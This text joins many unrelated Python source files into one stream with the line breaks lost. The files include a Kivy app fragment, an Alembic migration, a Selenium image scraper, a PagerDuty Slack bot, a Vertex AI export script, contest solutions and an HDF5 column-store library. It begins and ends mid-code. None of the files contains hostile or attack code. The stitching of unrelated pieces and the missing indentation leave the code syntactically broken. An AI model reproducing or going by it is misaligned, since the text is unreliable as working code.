allownone=True) def __init__(self, **kwargs): App.__init__(self, **kwargs) Clock.schedule_once(self.update_stats, .5) def update_stats(self, dt): self.fps = int(Clock.get_fps()) if self.selected_id is None: self.selected_coords = None self.selected_velocity = None else: ent = self.root.gameworld.entities[self.selected_id] physics = ent.cymunk_physics self.selected_coords = (int(ent.position.x), int(ent.position.y)) self.selected_velocity = (physics.body.velocity.x, physics.body.velocity.y) Clock.schedule_once(self.update_stats, .5) if __name__ == '__main__': YourAppNameApp().run()BMeu/Aerarium """Roles and Permissions Revision ID: ff115a5ac985 Revises: Create Date: 2018-12-01 14:19:35.777572 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'ff115a5ac985' down_revision = '' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('role', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=255), nullable=True), sa.Column('permissions', sa.BigInteger(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.add_column('user', sa.Column('role_id', sa.Integer(), nullable=True)) op.create_foreign_key(None, 'user', 'role', ['role_id'], ['id']) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint(None, 'user', type_='foreignkey') op.drop_column('user', 'role_id') op.drop_table('role') # ### end Alembic commands ### nnunet/configuration.py default_num_threads = 8 RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD = 3 # determines what threshold to use for resampling the low resolution axis # separately (with NN) import os nnUNet_raw_data_base = "./datasets" nnUNet_preprocessed = "./datasets/preprocess" RESULTS_FOLDER = "./datasets/trained_models" os.environ['CUDA_VISIBLE_DEVICES'] = '0, 1, 2, 3' DEBUG_MODE = True use_this_for_batch_size_computation_3D = 820000000 MIN_BATCHSIZE = 2 AXIS_2D = None # 0, 1, 2, None->argmax(orignal version) def set_paths(nnUNet_raw_data_base, nnUNet_preprocessed, RESULTS_FOLDER): os.environ['nnUNet_raw_data_base'] = nnUNet_raw_data_base os.environ['nnUNet_preprocessed'] = nnUNet_preprocessed os.environ['RESULTS_FOLDER'] = RESULTS_FOLDER set_paths(nnUNet_raw_data_base, nnUNet_preprocessed, RESULTS_FOLDER) from image_fetcher.download_images import multi_thread_image_download from image_fetcher.fetch_urls import fetch_images_from_yahoo from selenium import webdriver options = webdriver.ChromeOptions() options.add_argument("--no-sandbox") options.add_argument("--headless") driver = webdriver.Chrome("chromedriver.exe", options=options) search_term = "cat" total_images = 10 urls = fetch_images_from_yahoo(driver, search_term, total_images) driver.close() multi_thread_image_download( urls, headers={ "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" }, max_image_fetching_threads=1, image_download_timeout=5, directory=search_term, ) # Test imports import numpy as np import pandas as pd import lightgbm as lgb from bedrock_client.bedrock.analyzer.model_analyzer import ModelAnalyzer from bedrock_client.bedrock.analyzer import ModelTypes from bedrock_client.bedrock.api import BedrockApi from bedrock_client.bedrock.metrics.service import ModelMonitoringService from sklearn import metrics from sklearn.model_selection import train_test_split import streamlit as st def main(): print("All OK!") if __name__ == "__main__": main() oncall_slackbot/plugins/oncall.py # -*- coding: utf-8 -*- import logging import re from typing import Optional from pygerduty.v2 import ContactMethod # pylint: disable=import-error from oncall_slackbot.bot import listen_to, Message from oncall_slackbot.integrations import pagerduty LOGGER = logging.getLogger(__name__) CONTACT_METHOD_EMOTICON_BY_TYPE = { 'email_contact_method': ':email:', 'phone_contact_method': ':slack_call:', # Do not show anything for push or SMS notifications, since they duplicate the phone contact 'sms_contact_method': None, 'push_notification_contact_method': None, } def _get_contact_method_message(contact_method: ContactMethod, add_label: bool) -> Optional[str]: emoticon = CONTACT_METHOD_EMOTICON_BY_TYPE.get(contact_method.type) if not emoticon or (hasattr(contact_method, 'enabled') and not contact_method.enabled): return None label = '' if add_label: label = f' ({contact_method.label})' return f'{emoticon} {contact_method.address}{label}' @listen_to(r'who is (?:currently )?on(?:-| |)call', re.IGNORECASE) def who_is_on_call(message: Message): if not pagerduty.is_configured(): LOGGER.debug('Pager duty settings are not configured, cannot retrieve current on call') return current_oncall = pagerduty.get_current_oncall() if not current_oncall: message.reply(f'No current on-call information found for schedule {pagerduty.get_schedule_id()}') return # Build up contact methods string contact_method_messages = [] user_name = pagerduty.get_user_name(current_oncall.user) if user_name: contact_method_messages.append(f':slack: @{user_name}') contact_methods = current_oncall.user.contact_methods.list(time_zone='MDT') for contact_method in contact_methods: # Only add label if there is no user name contact_method_message = _get_contact_method_message(contact_method, not user_name) if contact_method_message: contact_method_messages.append(contact_method_message) # Get formatted end time end_time = pagerduty.get_humanized_datetime(current_oncall.end, current_oncall.user.time_zone) message.reply_webapi(f'{current_oncall.user.name} is currently on call', in_thread=True, blocks=[ { "type": "section", "text": { "type": "mrkdwn", "text": f'*<{current_oncall.user.html_url}|{current_oncall.user.name}>* is on call ' f'<{current_oncall.schedule.html_url}|until {end_time}>' } }, { "type": "section", "text": { "type": "mrkdwn", "text": '\n'.join(contact_method_messages) } }, ]) 0 import numpy as np import matplotlib.pyplot as plt import csv def load_data(path): with open(path, 'r') as f: reader = csv.reader(f, delimiter=',') header = next(reader) data = np.array(list(reader)).astype(float) return header, data if __name__ == '__main__': header, data = load_data('data/name-of-experiment/name-of-experiment_2021_11_19_14_23_55_0000--s-0/progress.csv') ns = range(data.shape[0]) print(header) print(header[10]) print(header[11]) print(header[12]) avs = data[:,11] maxs = data[:,10] mins = data[:,12] # method = "mixed" plt.fill_between(ns, mins, maxs, alpha=0.1) plt.plot(ns, avs, '-o', markersize=1, label="Train") plt.legend() plt.grid(True) plt.xlabel('Time step', fontsize = 15) plt.ylabel('Return', fontsize = 15) plt.title("SAC PCA", fontsize = 24) plt.savefig("plots/SAC PCA.png")from __future__ import unicode_literals from frappe import _ def get_data(): return [ { "label": _("Master"), "items": [ { "type": "doctype", "name": "Master Mobil" }, { "type": "doctype", "name": "Master Tipe Mobil" }, { "type": "doctype", "name": "Master Customer" }, { "type": "doctype", "name": "Master Driver" } ] }, { "label": _("Order List"), "items": [ { "type": "doctype", "name": "Dafatar Pesananan" }, { "type": "doctype", "name": "Kontrak Payung" }, { "type": "doctype", "name": "Pengembalian Mobil" }, { "type": "doctype", "name": "Sales Order Rent Car" } ] } ]mppwrapper/wrapper.py0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ @author: valengo """ from multiprocessing import Pool from multiprocessing import freeze_support from multiprocessing import cpu_count from typing import Callable, Any class MPPoolWrapper(object): """ Handle tasks multiprocessing using multiprocessing.Pool :param list tasks: a list of tasks. Each task is defined as a tuple :param int cores: number of cores to be used when multiprocessing :param int chunksize: chunksize of tasks to be send each time for a given process """ def __init__(self, tasks: list, cores: int, chunksize: int): self.tasks = tasks self._cores = cores self._chunksize = chunksize self.pool = None @classmethod def create_tasks(cls, task: Callable, data: [Any], *args, n_cores=None): chunks = MPPoolWrapper.create_chunks(data, n_cores=n_cores) tasks = [(task, chunk, *args) for chunk in chunks] return MPPoolWrapper(tasks, n_cores, len(chunks[0])) @property def cores(self): if self._cores is None: return cpu_count() return self._cores @property def chunksize(self): return self._chunksize @staticmethod def compute_chunksize(data_len: int, n_cores=None) -> int: if n_cores is None: n_cores = cpu_count() chunksize, extra = divmod(data_len, n_cores * 4) if extra: chunksize += 1 return chunksize @staticmethod def create_chunks(data: [Any], n_cores=None) -> [Any]: chunksize = MPPoolWrapper.compute_chunksize(len(data), n_cores=n_cores) chunks = [] for i in range(0, len(data), chunksize): chunks.append(data[i: i + chunksize]) return chunks def __getstate__(self): self_dict = self.__dict__.copy() del self_dict['pool'] return self_dict def __setstate__(self, state): self.__dict__.update(state) @staticmethod def _runstar(args) -> list: return args[0](*args[1:len(args)]) def run(self) -> list: """ Run tasks :return: a list containing the resulting stuff of tasks """ freeze_support() self.pool = Pool(self.cores) results = list(self.pool.imap(self._runstar, self.tasks)) self.pool.close() return [r for res in results for r in res] # Copyright (c) 2020-2021 The MMSegmentation Authors # SPDX-License-Identifier: Apache-2.0 # # Copyright (C) 2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 # from .base_pixel_sampler import BasePixelSampler from .ohem_pixel_sampler import OHEMPixelSampler from .class_weighting_pixel_sampler import ClassWeightingPixelSampler from .max_pooling_pixel_sampler import MaxPoolingPixelSampler __all__ = [ 'BasePixelSampler', 'OHEMPixelSampler', 'ClassWeightingPixelSampler', 'MaxPoolingPixelSampler', ] 0 import argparse from google.cloud import aiplatform def parse_arguments(parser): """Parses command line arguments. Args: parser: instance of `argparse.ArgumentParser`. """ parser.add_argument( "--project", help="GCP project to deploy model to.", type=str, required=True ) parser.add_argument( "--region", help="Region to deploy model in.", type=str, default="us-central1" ) parser.add_argument( "--model_display_name", help="Name of model to export.", type=str, default="" ) parser.add_argument( "--model_id", help="Model ID to export.", type=str, default="" ) parser.add_argument( "--export_format_id", help="Type of export format.", type=str, choices=[ "tflite", "edgetpu-tflite", "tf-saved-model", "tf-js", "core-ml", "custom-trained" ], default="custom-trained" ) parser.add_argument( "--destination_type", help="Whether model should be exported as an artifact to GCS or an image to GCR.", type=str, choices=["gcs", "gcr"], default="gcs" ) parser.add_argument( "--destination_path", help="GCS or GCR path where to export model artifact or image.", type=str, required=True ) def parse_command_line_arguments(): """Parses command line arguments and returns dictionary. Returns: Dictionary containing command line arguments. """ parser = argparse.ArgumentParser() # Add arguments to parser. parse_arguments(parser) # Parse all arguments. args = parser.parse_args() arguments = args.__dict__ return arguments def export_model(arguments): # Initialize. aiplatform.init( project=arguments["project"], location=arguments["region"] ) # Get model ID. model_id = arguments["model_id"] if not model_id: model_display_name = arguments["model_display_name"] model_name_match = aiplatform.Model.list( filter="display_name={}".format(model_display_name) ) if not model_name_match: print( "Model with name {} does NOT exist!".format( model_display_name ) ) return else: model_id = model_name_match[0].name.split("/")[-1] print("Model ID = {}".format(model_id)) # Fetch Model object. model = aiplatform.Model(model_name=model_id) # Finally export model. if arguments["destination_type"] == "gcs": response = model.export_model( export_format_id=arguments["export_format_id"], artifact_destination=arguments["destination_path"] ) else: response = model.export_model( export_format_id=arguments["export_format_id"], image_destination=arguments["destination_path"] ) print("Model export response = {}".format(response)) if __name__ == "__main__": arguments = parse_command_line_arguments() export_model(arguments) Projects/snaketemp.py import pygame import time import random pygame.init() #Colors white = (255, 255, 255) yellow = (255, 255, 102) black = (0, 0, 0) red = (213, 50, 80) green = (0, 255, 0) blue = (50, 153, 213) #PyGame Frame Size dis_width = 600 dis_height = 400 #Header dis = pygame.display.set_mode((dis_width, dis_height)) pygame.display.set_caption('Snake Game') #Creates Game Clock clock = pygame.time.Clock() snake_block = 10 snake_speed = 15 #Sets Font Size font_style = pygame.font.SysFont("bahnschrift", 25) score_font = pygame.font.SysFont("comicsansms", 35) #Score Keeper def Your_score(score): print() #Drawing of Snake def our_snake(snake_block, snake_list): print() #Message printer def message(msg, color): mesg = font_style.render(msg, True, color) dis.blit(mesg, [dis_width / 6, dis_height / 3]) #Loop to keep running the game def gameLoop(): #Game Loop Here print() #Runs loop Over and Over gameLoop()# https://open.kattis.com/problems/includescoring # first input: number of contestants num_c = int(input()) all_c = [] for i in range(num_c): all_c.append(list(map(int,input().split()))) all_c[i].append(i) #store initial index #list values: [0=solutions, 1=penalty, 2=end-time, 3=on-site, 4=original input index, 5=points earned] #sort the list by the various keys/orders all_c = sorted(sorted(sorted(all_c, key = lambda x:x[2]), key = lambda x:x[1]), key = lambda x:x[0], reverse = True) #generate scores points = [100,75,60,50,45,40,36,32,29,26,24,22,20,18,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1] for i in range(len(all_c)): try: all_c[i].append(points[i]) except: all_c[i].append(0) #check for ties, update scores sum = 0 tied = [] for i in range(num_c-1): if all_c[i][5] == all_c[i+1][5]: tied.append(i) else: for x in tied: all_c[x][5] = sum//len(tied) sum = 0 tied = [] #catch for last iteration of previous for loop if len(tied) > 0: tied.append(num_c-1) for x in tied: all_c[x][5] = sum//len(tied) #sort back to original sort all_c = sorted(all_c, key = lambda x:x[4]) #add point for on-site or not, and print for i in range(num_c): all_c[i][5] += all_c[i][3] print(all_c[i][5]) grobber/sources/__init__.py1-10 import asyncio import importlib import logging from typing import Any, AsyncIterator, Dict, List, Optional, Set, Type from ..exceptions import UIDUnknown from ..languages import Language from ..locals import anime_collection from ..models import Anime, SearchResult, UID from ..utils import anext log = logging.getLogger(__name__) _SOURCES = ["gogoanime", "masteranime"] SOURCES: Dict[str, Type[Anime]] = {} def register_source(anime: Type[Anime]): SOURCES[f"{anime.__module__}.{anime.__qualname__}"] = anime def _load_sources(): for SRC in _SOURCES: importlib.import_module("." + SRC, __name__) _load_sources() log.info(f"Using Sources: {', '.join(source.__name__ for source in SOURCES.values())}") CACHE: Set[Anime] = set() async def save_dirty() -> None: if not CACHE: return num_saved = 0 coros = [] for anime in CACHE: if anime.dirty: num_saved += 1 coro = anime_collection.update_one({"_id": await anime.uid}, {"$set": anime.state}, upsert=True) coros.append(coro) await asyncio.gather(*coros) log.debug(f"Saved {num_saved} dirty out of {len(CACHE)} cached anime") CACHE.clear() async def delete_anime(uid: str) -> None: log.info(f"deleting anime {uid}...") await anime_collection.delete_one(dict(_id=uid)) async def build_anime_from_doc(uid: str, doc: Dict[str, Any]) -> Anime: try: cls = SOURCES[doc["cls"]] except KeyError: log.warning(f"couldn't find source for {uid}: {doc['cls']}") await delete_anime(uid) raise UIDUnknown(uid) anime = cls.from_state(doc) CACHE.add(anime) return anime async def get_anime(uid: UID) -> Optional[Anime]: doc = await anime_collection.find_one(uid) if doc: return await build_anime_from_doc(uid, doc) return None async def get_anime_by_title(title: str, *, language=Language.ENGLISH, dubbed=False) -> Optional[Anime]: doc = await anime_collection.find_one({"title": title, f"language{Anime._SPECIAL_MARKER}": language.value, "is_dub": dubbed}) if doc: return await build_anime_from_doc(doc["_id"], doc) return None async def search_anime(query: str, *, language=Language.ENGLISH, dubbed=False) -> AsyncIterator[SearchResult]: sources: List[AsyncIterator[SearchResult]] = [source.search(query, language=language, dubbed=dubbed) for source in SOURCES.values()] def waiter(src): async def wrapped(): try: res = await anext(src) except Exception as e: res = e return res, src return asyncio.ensure_future(wrapped()) waiting_sources = {waiter(source) for source in sources} while waiting_sources: done: asyncio.Future (done, *_), waiting_sources = await asyncio.wait(waiting_sources, return_when=asyncio.FIRST_COMPLETED) result, source = done.result() if isinstance(result, StopAsyncIteration): log.debug(f"{source} exhausted") elif isinstance(result, Exception): log.exception(f"{source} failed to yield a search result!") else: waiting_sources.add(waiter(source)) CACHE.add(result.anime) yield result """ References: * https://github.com/facebookresearch/suncet/blob/master/src/snn_fine_tune.py """ from . import losses import tensorflow as tf suncet_loss = losses.get_suncet_loss() def train_step(sup_loader, encoder: tf.keras.Model): """ One step of fine-tuning after PAWS pre-training. :param sup_loader: data loader for the labeled support set :param encoder: trunk with projection head (with batchnorm layers frozen) :return: loss and gradients """ # Unpack the data images, labels = sup_loader with tf.GradientTape() as tape: # Forward pass (z: projection output) _, z = encoder(images) loss = suncet_loss(z, labels) # Compute gradients gradients = tape.gradient(loss, encoder.trainable_variables) return loss, gradients 1-10 #!/usr/bin/env python3 from sys import argv from collections import defaultdict, Counter, deque from re import match, search from math import ceil filename = argv[1] if len(argv) > 1 else '0.in' cases = [] with open(filename) as fp: for i, line in enumerate(fp): line = line.strip() cases.append([int(n) for n in line.split(' ')]) def solve(b, a): return ceil((2*a)/b) for case in cases: print(solve(*case))ssolari/simpleh5 """ H5ColStore is the top-level object to use to write and read tabular column stores. The H5ColStore object is passed a string representing the full file path to the desired .h5(hdf5) file. Instantiating the object is harmless, all future operations will operate on this .h5 file. Example:: my_column_store = H5ColStore('all_tables.h5') The goal of H5ColStore is to create a simplified experience with high performance for data scientists to focus on analytics at the trade off of 'optimal' performance. Time and effort are a trade off and H5ColStore tries to enable a focus on using data in an efficient manner rather than providing hooks into all parameterization of how a file can be stored and what compressors are used. """ from datetime import datetime import logging import numpy as np import os import re import tables as tb import traceback from typing import Optional, Union import uuid from simpleh5.utilities.search_utilities import _filter_inds from simpleh5.utilities.serialize_utilities import msgpack_dumps, msgpack_loads ATTR_COLDTYPE = 'col_dtype' ATTR_COLFLAV = 'col_flavor' ATTR_NROWS = 'num_rows' ATTR_CTABLE = '_ctable_attrs' with open(os.path.join(os.path.dirname(__file__), '..', 'VERSION')) as fd: VERSION = fd.read().strip() class H5ColStore(object): def __init__(self, h5file: str): if not re.search('\.h5$', h5file): raise Exception(f'h5file should have a .h5 extension') # path to the .h5 file that will be operated on self._h5file = h5file # default all operations to be blosc filter with highest comp level self._filters = tb.Filters(complevel=9, complib='blosc', fletcher32=False) def __str__(self): with self.open(mode='r') as h5: return h5.__str__() def exists(self): return os.path.exists(self._h5file) def open(self, mode: str='a') -> tb.File: """ Open the file and return file handle to use with methods requiring open file handle. Should be used as:: colstore = SimpaHdf5(filename) with colstore.open(mode='a') as h5: colstore.fh_somemethod(h5, ...) :param mode: open mode in ['r', 'r+', 'a', 'w'] (default='a') :return: """ if mode == 'a' or mode == 'w': try: fh = tb.open_file(self._h5file, mode=mode, filters=self._filters) except IOError: os.makedirs(os.path.dirname(self._h5file), exist_ok=True) fh = tb.open_file(self._h5file, mode=mode, filters=self._filters) else: fh = tb.open_file(self._h5file, mode=mode, filters=self._filters) return fh def create_ctable(self, table_name: str, col_dtypes: dict, col_shapes: Optional[dict]=None, expectedrows: int=10000) -> None: """ Create a new coltable under table path. Note that all data is compressed therefore unknown length strings can be hedged by using a large number and allowing compression to save space. Even with S1000 a string 'a' will take up a much smaller amount of space due to compression. Same with compressed objects which are actually compressed twice to maximize ability to not overflow specified length in unknown cases. :param table_name: name of columnar table :param col_dtypes: dictionary of (column-name -> dtype) arguments. Dtype(str) should be one of: * 'i': 64-bit integer * 'f': 64-bit float * 'n': 64-bit float * 'sx': len x string (unicode will be converted to utf-8 so length applies to final utf-8 strings) * 'ox': len x object (objects are serialized via msgpack so len refers to final serialized bytes len +1) * 'cx': len x compressed object (msgpack obj is compressed so len refers to final compressed len) Note small objects when compressed can increase in size. :param col_shapes: (optional) dictionary of shapes for each column. Should have the form (0,) or (0, x). Mostly used when a 2-d array will be a column. Not needed if a column is 1 dimension i.e. (0,). Note the first entry is 0 if creating an empty table and appending data. :param expectedrows: (optional, default=10000) determines chunk size, if number of rows will be very large, then good to specify to optimize chunking. :return: Example table creation from definition:: h = SimpaHdf5('myfile.h5') # define table col_dtype = { 'col1': 'i' # integers 'col2': 's3' # len 3 strings (after utf-8 conversion) 'col3': 'o100' # uncompressed serialized objects with final byte len 100 'col4': 'f' # floats 'col5': 'c200' # compressed serialized objects with final byte len 200 } h.create_table('table1', col_dtype) """ if col_shapes is None: col_shapes = {} with self.open(mode='a') as h5: self._create_ctable(h5, table_name, col_dtypes, col_shapes, expectedrows=expectedrows) def _create_ctable(self, h5, table_path, col_dtype, col_shapes, expectedrows: int=10000): # convert all dtypes to lowercase for col in col_dtype: col_dtype[col] = col_dtype[col].lower() for col_name, dtype in col_dtype.items(): self._create_column_from_dtype(h5, table_path, col_name, dtype, col_shapes.get(col_name, None), expectedrows=expectedrows) self._write_attrs(h5, table_path, ATTR_COLDTYPE, col_dtype) def delete_ctable(self, table_name: str, raise_exception=False) -> None: """ Delete the table if it exists. Note that this will not reduce the size of the file. A repack is needed to reduce file size after data deletion. :param table_name: path to table :param raise_exception: raise an exception if the table doesn't exist. If False and the table does not exist the method will simply return. :return: """ nodepath = self._norm_path(table_name) with self.open(mode='a') as h5: if raise_exception: h5.remove_node(nodepath, recursive=True) else: try: h5.remove_node(nodepath, recursive=True) except: pass def add_column(self, table_path: str, col_name: str, col_data: (list, tuple, np.ndarray)=None, col_dtype: str=None, shape=(0,)): """ Add a column of data to an existing table. The length of the data must be the same length as the existing table. The addition of a column is a cheap operation since data is stored by column. :param table_path: internal path to table :param col_name: name of new column :param col_data: data for new column :param col_dtype: optional data type :param shape: shape of column if different than (0,) :return: """ if col_data is None: raise NotImplementedError(f'Default back filling is coming soon...') with self.open(mode='a') as h5: table_info = self._table_info(h5, table_path) if len(table_info) == 0: raise Exception(f'Addcol needs an existing table at {table_path} in {self._h5file}') if table_info[ATTR_NROWS] != len(col_data): raise Exception(f'New column data different length ({len(col_data)}) ' f'than table ({table_info[ATTR_NROWS]}) in {self._h5file}') if col_dtype: self._create_column_from_dtype(h5, table_path, col_name, col_dtype, shape) self._add_column(h5, table_path, col_name, col_data, col_dtype, True) else: col_dtype = self._create_column_from_data(h5, table_path, col_name, col_data) # set the datatype coldt = table_info[ATTR_COLDTYPE] coldt[col_name] = col_dtype self._write_attrs(h5, table_path, ATTR_COLDTYPE, coldt) # set the flavor colflavor = table_info[ATTR_COLFLAV] if isinstance(col_data, np.ndarray): colflavor[col_name] = 'numpy' else: colflavor[col_name] = 'python' self._write_attrs(h5, table_path, ATTR_COLFLAV, colflavor) def _add_column(self, h5: tb.File, table_name: str, column_name: str, data: list, dtype: str, resize: bool): data = self._convert_data(data, dtype) colpath = self._path(table_name, column_name) if re.match(r'[osc](\d+)', dtype): colnode = self._safe_col_str_change(h5, colpath, dtype, data, resize) else: colnode = self._get_node(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") colnode.append(data) def delete_column(self, table_name: str, col_name: str, raise_exception=False) -> None: """ Delete a single column from a table. :param table_name: table path :param col_name: name of column :param raise_exception: ignore exceptions when trying to delete colom (like for a non-existant column) :return: """ colpath = self._path(table_name, col_name) with self.open(mode='a') as h5: simpah5_attrs = self._read_attrs(h5, table_name) if not simpah5_attrs and raise_exception: raise Exception(f"Table doesn't exist: {table_name} in {self._h5file}") elif col_name not in simpah5_attrs[ATTR_COLDTYPE] and raise_exception: raise Exception(f"Column doesn't exist: {table_name}/{col_name} in {self._h5file}") if raise_exception: h5.remove_node(colpath) del simpah5_attrs[ATTR_COLDTYPE][col_name] del simpah5_attrs[ATTR_COLFLAV][col_name] else: try: h5.remove_node(colpath) del simpah5_attrs[ATTR_COLDTYPE][col_name] del simpah5_attrs[ATTR_COLFLAV][col_name] except: pass if simpah5_attrs: self._write_attrs(h5, table_name, ATTR_COLDTYPE, simpah5_attrs[ATTR_COLDTYPE]) self._write_attrs(h5, table_name, ATTR_COLFLAV, simpah5_attrs[ATTR_COLFLAV]) def append_ctable(self, table_name: str, col_data: dict, col_dtypes: Optional[dict]=None, resize: bool=True) -> None: """ Append data to all columns in table. Data for columns must all be the same length and all columns must be specified. See also :meth:`.create_ctable` for table data types and creating tables. If the table does not exist it will be created with the datatypes defined by the data. Consider creating the table first with predefined data types, or specifying the col_dtypes attribute, which will set the datatypes for the table on the first write only. On the first append of any data the flavor (python or numpy) of each data column is inspected (from the first element) and the flavor correspondingly stored with the table. On subsequent reads of the data the stored flavor (list or ndarray) of data will be returned. If the data is passed as a numpy ndarray then the data will be returned as a ndarray if passed as a list then data will be returned as a python list. 'o' or 'c' datatypes always have the flavor of a python list. :param table_name: name of table to write :param col_data: dictionary of {'column_name': [data1, data2, ...], ...} :param col_dtypes: dictionary of {'column_name': dtype1, ...}. col_dtypes is only used if table does not exist on first append and will make call to :meth:`.create_ctable`. :param resize: Applies to string columns [s, o, c]. (default=True). If True, prevents possibility of overflowing string or object out of defined column size. In the case that a string object is too large, the entire column is rewritten to the size of the largest string in the newly appended data. Note, this can be expensive! The entire column is read into memory before rewriting. If False an exception will be raised if any data is longer than the existing size. :return: None Example data:: h = SimpaHdf5('myfile.h5') col_data = { 'col1': [1, 2, 3], 'col2': ['abc', 'def', 'geh'], 'col3': [ {'this is a dict': 123}, {'a': 2, 'hello': 'world'}, ['this is a list'] ], 'col4': np.array([1.2, 3.4, 5.6]) } Create then append data:: # define table col_dtype = { 'col1': 'i', # integers 'col2': 's5', # len 3 strings (after utf-8 conversion) 'col3': 'o100', # uncompressed objects with final byte len 100 'col4': 'f' # floats } h.create_ctable('mytable_1', col_dtype) h.append_ctable('mytable_1', col_data) mytable_1 will have the following dtype:: info = h.table_info('mytable_2') print(info) # {'col_dtype': {'col1': 'i', 'col2': 's5', 'col3': 'o100', 'col4': 'f'}, # 'col_flavor': {'col1': 'python', 'col2': 'python', 'col3': 'python', 'col4': 'numpy'}, # 'num_rows': 3} OR create from data alone:: h.append_ctable('mytable_2', col_data) mytable_2 will have the following dtype:: info = h.table_info('mytable_2') print(info) # {'col_dtype': {'col1': 'i', 'col2': 's3', 'col3': 'o18', 'col4': 'f'}, # 'col_flavor': {'col1': 'python', 'col2': 'python', 'col3': 'python', 'col4': 'numpy'}, # 'num_rows': 3} """ if col_dtypes is None: col_dtypes = {} with self.open(mode='a') as h5: self._append_ctable(h5, table_name, col_data, resize=resize, col_dtypes=col_dtypes) def update_ctable(self, table_name: str, query: Union[list, tuple], col_data: dict, resize: bool=True) -> None: """ Perform an update of data in an existing table. :param table_name: table to update :param query: (required) match criteria to define rows to update :param col_data: (required) data to replace in each column. Only columns and data in col_data will be updated. col_data should either contain lists of length 1 (all found rows will be updated with this information), or the exact same length as the number of indices found. If data is presented with len > 1 and a mismatch occurs with the length of the indices that are returned from the match, an Exception will be raised. :param resize: True (default) prevents possibility of overflowing object or string columns. In the case that an object is too large the entire column is rewritten to the size of the largest string in the new append. Note the entire column is read into memory before rewriting. If False an exception will be raised, but other columns may have been written. :return: """ if not query: raise Exception(f"A query is required for update_ctable in {self._h5file}") # error checking assert len(col_data) > 0 change_len = None for col in col_data: if change_len is None: change_len = len(col_data[col]) elif change_len != len(col_data[col]): raise Exception(f"Column data specified is not the same length col {col} = {len(col_data[col])} " f"in {self._h5file}") with self.open(mode='a') as h5: simpah5_attrs = self._read_attrs(h5, table_name) col_dtype = simpah5_attrs[ATTR_COLDTYPE] # return a dictionary of node name to node pointers node_data = h5.get_node(self._norm_path(table_name))._v_children inds = _filter_inds(node_data, query) inds = np.nonzero(inds)[0] # check that inds match column change length if change_len != 1 and change_len != len(inds): raise Exception(f"Update column length different than rows length found in match in {self._h5file}") for col, data in col_data.items(): if col not in col_dtype: logging.warning(f"Column {col} specified for updating, " f"but not found in table {table_name}...ignoring") data = self._convert_data(col_data[col], col_dtype[col]) colpath = self._path(table_name, col) if re.match(r'[osc](\d+)', col_dtype[col]): colnode = self._safe_col_str_change(h5, colpath, col_dtype[col], data, resize) else: colnode = self._get_node(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") colnode[inds] = data def read_ctable(self, table_name: str, cols: Optional[list]=None, query: Union[list, tuple]=(), inds: Union[list, tuple]=(), flavor: str='') -> dict: """ Read data from the table and return a dictionary of columns. Data is returned in the flavor it was stored in. Search capability exists through query parameter. Both old style and new style work (see below). Example read:: h = SimpaHdf5('myfile.h5') data = h.read_ctable('table1', cols=['col2', 'col4']) # return data will look like data = { 'col2': [c2_val1, c2_val2, ...], 'col4': [c4_val1, c4_val2, ...] } query can filter datavalues across all columns even if they are not returned. A query has the format:: # (col1 > 1.2) & (col1 < 2.3) & (col2 == 'abc') query = [ ('col1', '>', 1.2), ('col1', '<', 2.3), ('col2', '==', 'abc') ] # col1 == 1.2 query = ('col1', '==', 1.2) # NOTE: in the case of a single condition as above the additional surrounding list is not needed. # (col1 > 1.2) & (col1 < 2.3) & ((col2 == 'abc') | (col2 == 'def') | (col3 == True)) & (col2 != 'ggg') query = [ ('col1', '>', 1.2), ('col1', '<', 2.3), (('col2', '==', 'abc'), ('col2', '==', 'def'), ('col3', '==', True)), ('col2', '!=', 'ggg') ] Where each column condition in query list are logical & ('and') together. Sub-conditions within a single query column name are logical | ('or') together. :param table_name: path to table :param cols: return only this list of columns :param query: see description above :param inds: a list of indices to pull, will override any query :param flavor: ['python', 'numpy'], if set will force columns to be returned as either lists(python) or numpy arrays (numpy). Columns specified as objects 'o' or compressed objects 'c' ignore flavor. Returning numpy arrays can be slightly faster. :return: return a dictionary of column name to list/array values """ return_data = None col_dtype = None with self.open(mode='r') as h5: simpah5_attrs = self._read_attrs(h5, table_name) if len(simpah5_attrs) == 0: raise Exception(f"{table_name} doesn't exist in {self._h5file}") col_dtype = simpah5_attrs[ATTR_COLDTYPE] # determine columns to return return_cols = set(col_dtype.keys()) if cols: return_cols = return_cols.intersection(set(cols)) if query and not inds: allcols = h5.get_node(self._norm_path(table_name))._v_children inds = _filter_inds(allcols, query) # get data off disk return_data = {} for col in return_cols: node = self._get_col(h5, self._path(table_name, col)) if len(inds) == 0: # read in all node data return_data[col] = node.read() else: if len(node.shape) == 2: return_data[col] = node[np.array(inds), :] else: return_data[col] = node[np.array(inds)] # convert data to correct format. filehandle doesn't need to be open, so do here to get data off disk first for col in return_data.keys(): dtype = col_dtype[col] if re.match(r'o', dtype): return_data[col] = [msgpack_loads(x, compress=False) for x in return_data[col]] elif re.match(r'c', dtype): return_data[col] = [msgpack_loads(x, compress=True) for x in return_data[col]] else: if re.match(r's', dtype): return_data[col] = np.core.defchararray.decode(return_data[col], 'utf-8') else: return_data[col] = return_data[col] if flavor and flavor == 'numpy': pass elif flavor and flavor == 'python' and isinstance(return_data[col], np.ndarray): return_data[col] = return_data[col].tolist() elif ATTR_COLFLAV in simpah5_attrs and \ simpah5_attrs[ATTR_COLFLAV][col] == 'python' and isinstance(return_data[col], np.ndarray): return_data[col] = return_data[col].tolist() elif ATTR_COLFLAV not in simpah5_attrs and isinstance(return_data[col], np.ndarray): # default to python return_data[col] = return_data[col].tolist() return return_data def iter_column(self, table_name: str, col: str, flavor: str=''): """ Iterate through all values of a single column in table. :param table_name: :param col: :return: """ with self.open(mode='r') as h5: simpah5_attrs = self._table_info(h5, table_name) if 